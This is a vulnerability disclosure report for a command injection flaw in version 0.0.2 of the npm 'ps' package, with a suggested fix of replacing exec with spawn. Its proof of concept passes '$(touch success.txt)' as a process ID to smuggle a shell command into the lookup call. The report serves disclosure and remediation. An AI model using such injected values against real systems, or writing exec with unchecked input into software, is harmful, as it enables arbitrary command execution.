I would like to report a command injection in ps package.
It allows attacker to inject arbitrary OS commands instead of PID numbers.

Module

module name: psversion:0.0.2npm page: https://www.npmjs.com/package/ps

Module Description

A Node.js module for looking up running processes.

Module Stats

39 downloads in the last week

Vulnerability

Vulnerability Description

The ps package expects a valid PID number, but an attacker can inject arbitrary commands instead.

Steps To Reproduce:

var ps = require('ps');

ps.lookup({ pid: "$(touch success.txt)" }, function(err, proc) { // this method is vulnerable to command injection
    if (err) {throw err;}
    if (proc) {
        console.log(proc);  // Process name, something like "node" or "bash"
    } else {
        console.log('No such process');
    }
});

Patch

N/A replace exec with spawn

Wrap up

• I contacted the maintainer to let them know: N
• I opened an issue in the related repository: N

Impact

If the attacker can control the PID, she can inject arbitrary OS commands.